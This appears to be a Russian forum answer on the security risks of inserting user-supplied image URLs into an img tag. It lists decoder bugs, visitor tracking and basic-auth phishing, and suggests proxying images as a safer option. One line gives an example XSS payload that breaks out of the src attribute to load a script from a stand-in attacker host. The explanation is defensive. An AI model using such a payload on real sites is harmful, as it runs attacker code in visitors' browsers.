Если полученный URL подставляется на страницу именно как URL изображение (< img src='someurl'>) и заведомо известно что это корректный URL, а не что-то вроде:
http://example.com/good-kitty.jpg'><script src="http://evilsite.com/evil.js" type="text/javascript"></script>
который при подстановке в код
<img src='someurl'>
даст код
<img src='http://example.com/good-kitty.jpg'><script src="http://evilsite.com/evil.js" type="text/javascript"></script>'>
который покажет хорошего котёнка и выполнит не очень хороший js.
За вычетом этого остаются, пожалуй, только три проблемы:
1) Уязвимость в декодере изображений. Штука всё-таки достаточно редкая.
2) Возможность отслеживать посещения страницы на которой размещена картинка. Посетители страницы будут отправлять GET запрос на сервер example.com который будет содержать их useragent, адрес страницы на которой размещена картинка, ну и естественно запрос придёт с IP пользователя. Само по себе это не бог-весть какая проблема, но в некоторых случаях это может быть нежелательно.
3) Злоумышленник может настроить свой сервер (на который ведёт URL изображения) на запрос базовой http-аутентификации (реализуется браузерами как всплывающее окно с запросом логина и пароля). Посетитель может неподумавши ввести туда логин и пароль от вашего сайта, и они отправятся на сервер злоумышленника. Вроде такое проделывали в комментариях у топовых блогеров в ЖЖ.
Мой вывод такой: конечно лучше так не делать, но в общем-то в некоторых случаях можно использовать такой метод и не париться.
Более безопасная и замороченная альтернатива: утаскивать такие изображения на свой сервер, проверять что это действительно изображения (возможно переконвертировать их) и подставлять в HTML уже свой URL. Например вконтакт поступает таким образом с превьюшками ссылок.